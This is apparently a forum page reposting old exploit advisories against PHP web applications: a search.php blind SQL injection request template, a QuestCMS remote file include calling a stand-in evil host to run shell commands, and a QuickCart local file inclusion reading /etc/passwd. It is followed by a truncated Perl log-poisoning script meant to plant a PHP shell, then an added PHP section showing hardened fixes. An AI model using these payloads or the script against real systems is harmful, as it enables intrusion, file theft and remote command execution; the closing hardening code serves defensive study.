Consequently, if you perform a search request with only a keyword and no author, for example, an attacker is able to populate $keyword_results and then the $search_ids indexes with any content coming from $result_list. Finally, the $search_ids array is imploded and put into the SQL query without any protection. In a word, there is an SQL injection here.
3) Exploitation
With an adequate UNION query in the $result_list array, an attacker is able to perform blind SQL injection and, for example, retrieve the entire hash of any user just by checking whether the script returned results for his malicious search. For example, you can send the following request:
search.php?action=search&keywords=hello&author=&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=1&result_list[< UNION SQL QUERY >
sexyvirus(HCE)
QuestCMS (main.php) Remote File Include Vulnerability
Code:
!!!!!!!!!WWW.SİBERSAVASCİLAR.COM!!!!!!!!!
-
Title : Questcms Remote File Include Vulnerability
-
#Author: Crackers_Child
#cont@ct: crackers_child@sibersavascilar.com
-
Affected software description :
-
Application : Questwork Web Content Management system (QuestCMS)
URL : http://www.questwork.com
-
dork : allinurl:"/questcms/"
Exploit :
-
Usage:
http://[target]/[questcms_path]/main/main.php?pi=http://[evilhost]/cmd.txt?&cmd=ls
-
greets:
X_ALPREN_X,Root_Mor and My Other Friends
-
- [ WWW.SİBERSAVASCİLAR.COM ] -
# milw0rm.com [2006-08-07]
vns3curity(HCE)
QuickCart 2.0 (categories.php) Local File Inclusion Exploit
Code:
##################################################################
#                                                                #
#  r0ut3r Presents                                               #
#  Another r0ut3r discovery!                                     #
#  writ3r [at] gmail.com                                         #
#                                                                #
#  QuickCart 2.0 Local File Inclusion Exploit                    #
##################################################################
# Software: QuickCart 2.0
#
# Vendor: http://opensolution.org/
#
# Released: 2006/12/03
#
# Critical: Moderately critical
#
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com)
#
# Note: The information provided in this document is for Quick Cart administrator
#       testing purposes only!
#
# register_globals must be on
# gpc_magic_quotes must be off
#
# actions_admin/categories.php?config[db_type]=
# actions_admin/couriers.php?config[db_type]=
# actions_admin/orders.php?config[db_type]=
# actions_admin/products.php?config[db_type]=
# actions_client/products.php?config[db_type]=
# actions_client/orders.php?config[db_type]=
#
# Vulnerable code:
# require_once DIR_CORE.'couriers-'.$config['db_type'].'.php';
#
# Patch: (Place this code at the top of every file)
# if(basename(__FILE__) == basename($_SERVER['PHP_SELF']))
#     die();
#
# Exploit: categories.php?config[db_type]=../../../../../../../../../../../etc/passwd%00
#
# Usage: perl localfilexpl.pl 127.0.0.1 actions_admin/categories.php?config[db_type]=
##################################################################
##################################################################
#  Local File Inclusion Exploiter                                #
#                                                                #
#  This script attempts to exploit a local file include          #
#  vulnerability by finding a readable http log file, then by    #
#  sending a specially crafted http request to the server in     #
#  order to insert a PHP shell into the log files. A shell is    #
#  then spawned.                                                 #
#                                                                #
#  Created By r0ut3r (writ3r [at] gmail.com)                     #
##################################################################
use IO::Socket;
use Switch;
$port   = "80";       # connection port
$target = $ARGV[0];   # target host, e.g. localhost
$vulnf  = $ARGV[1];   # vulnerable file and parameter, e.g. /include/WBmap.php?l=
$opt    = $ARGV[2];   # -p (not needed)
sub Header()
{
print q {Local File Inclusion Exploiter - By r0ut3r (writ3r [at] gmail.com)
-
};
}
sub Usage()
{
print q {Usage: localfilexpl.pl [target] [folder & vulnerable file] [opt]
Example: localfilexpl.pl localhost /include/WBmap.php?l= -p
opt = -p (To print received content)
};
exit();
}
Header();
if (!$target || !$vulnf) {
Usage(); }
@targets = (
"var/log/httpd/access_log",
"var/log/httpd/error_log",
"var/log/access_log",
"var/log/error_log",
"var/www/logs/access.log",
"var/www/logs/access_log",
"var/www/logs/error_log",
"var/www/logs/error.log",
"apache/logs/access_log",
"apache/logs/error.log",
"etc/httpd/logs/access.log",
"etc/httpd/logs/access_log",
"etc/httpd/logs/error.log",
"etc/httpd/logs/error_log",
"usr/local/apache/logs/access.log",
"usr/local/apache/logs/access_log",
"usr/local/apache/logs/error.log",
"usr/local/apache/logs/error_log",
"var/log/apache2/error_log",
"var/log/apache2/error.log",
"var/log/apache2/access_log",
"var/log/apache2/access.log",
"access_log",
);
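Added example, not code from any of the advisories above or from the affected projects: hardened forms of the two PHP patterns this page discusses, the imploded $search_ids in search.php and the $config['db_type'] include in QuickCart. The function names, the table and column names in the SQL fragment, and the driver file names are assumptions.

```php
<?php
// Added example (not code from the page's advisories or the affected
// projects): hardened forms of the two PHP patterns this page discusses.
// Helper names, SQL column names and driver file names are assumptions.

// 1) search.php: $search_ids was imploded straight into the SQL query.
//    The IDs are numeric, so casting every element strips anything that
//    was smuggled in through $result_list[]; the query only sees integers.
function build_search_in_clause(array $search_ids): string
{
    $ids = array_map('intval', $search_ids);
    $ids = array_filter($ids, function ($id) { return $id > 0; });
    if (empty($ids)) {
        return 'WHERE 0';   // no rows rather than an unconstrained query
    }
    return 'WHERE t.id IN (' . implode(',', $ids) . ')';
}

// 2) QuickCart: require_once DIR_CORE.'couriers-'.$config['db_type'].'.php'
//    let request data choose the file. Select it from a fixed map instead,
//    so traversal sequences and a trailing NUL never reach the include.
const DB_DRIVERS = [
    'mysql'  => 'couriers-mysql.php',   // assumed file names
    'sqlite' => 'couriers-sqlite.php',
];

function driver_path_safe(string $dir_core, array $config): string
{
    $type = isset($config['db_type']) ? (string) $config['db_type'] : '';
    if (!array_key_exists($type, DB_DRIVERS)) {
        throw new RuntimeException('unsupported db_type');
    }
    return rtrim($dir_core, '/') . '/' . DB_DRIVERS[$type];
}

// Constructed inputs shaped like the two payloads quoted on this page.
echo build_search_in_clause(['12', '7', "5 UNION SELECT password FROM users"]), "\n";
// WHERE t.id IN (12,7,5)   -- the UNION fragment is gone
try {
    driver_path_safe('/var/www/core', ['db_type' => "../../../../etc/passwd\0"]);
} catch (RuntimeException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
echo driver_path_safe('/var/www/core', ['db_type' => 'mysql']), "\n";
// /var/www/core/couriers-mysql.php
```

The allow-list fix does not depend on register_globals or magic_quotes being set a particular way, which is why it is preferable to the basename() check quoted in the advisory.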